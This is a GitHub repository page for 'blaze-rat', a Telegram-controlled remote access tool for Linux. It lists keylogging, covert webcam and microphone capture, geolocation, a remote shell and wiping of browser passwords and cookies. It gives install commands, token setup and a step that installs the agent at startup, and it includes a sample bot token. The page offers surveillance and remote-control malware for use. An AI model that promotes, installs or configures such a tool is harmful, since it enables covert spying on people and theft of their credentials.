Skip to content

🔥 Telegram bot written on Python that control your Linux machine.

Notifications You must be signed in to change notification settings

kraloveckey/blaze-rat

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation


🔥 Control your 🐧 Linux machine with Telegram bot.

"Buy Me A Coffee"

🌿 Functions:

  • Desktop Screenshot
  • Webcam Screenshot/Video
  • Microphone Recorder
  • Keylogger
  • Geolocation based on IP/BSSID
  • Filemanager
  • Taskmanager
  • Remote Shell
  • Remote keyboard
  • Power control (shutdown, restart, suspend, logoff)
  • Volume control
  • Wipe user data (browsers history, passwords, cookies...)
  • Rights management using authorization tokens

🔨 Installation:

  • Arch based: sudo pacman -S python3 python3-pip amixer portaudio xdotool --noconfirm
  • Debian based: sudo apt install python3 python3-pip amixer portaudio xdotool -y
git clone https://github.com/kraloveckey/blaze-rat
cd blaze-rat/
pip3 install --user -r requirements.txt

⚙️ Initialization:

  1. You need to save your telegram bot token
python3 main.py --InitApiToken 1393978203:AAEIdXztREV2D1KEx3ggvuOn2gSS12bPDLc
  1. Now you need to create a token by which you will log in to the bot.
    🔔 Token with full access:
    python3 main.py --TokenCreate --name root --perms "*"
    ... Created new token '681fb124-9009-4a9b-964d-030c55c274b7', with permissions: *
    🔕 Limited access token:
    python3 main.py --TokenCreate --name observer --perms SCREENSHOT WEBCAMERA KEYLOGGER LOCATION
    ... Created new token '52eff873-9c14-4c2b-8729-b2c6367925b7', with permissions: SCREENSHOT, WEBCAMERA, KEYLOGGER, LOCATION
  2. Add to startup
python3 main.py --InstallAgent

Releases

No releases published

Packages

No packages published

Languages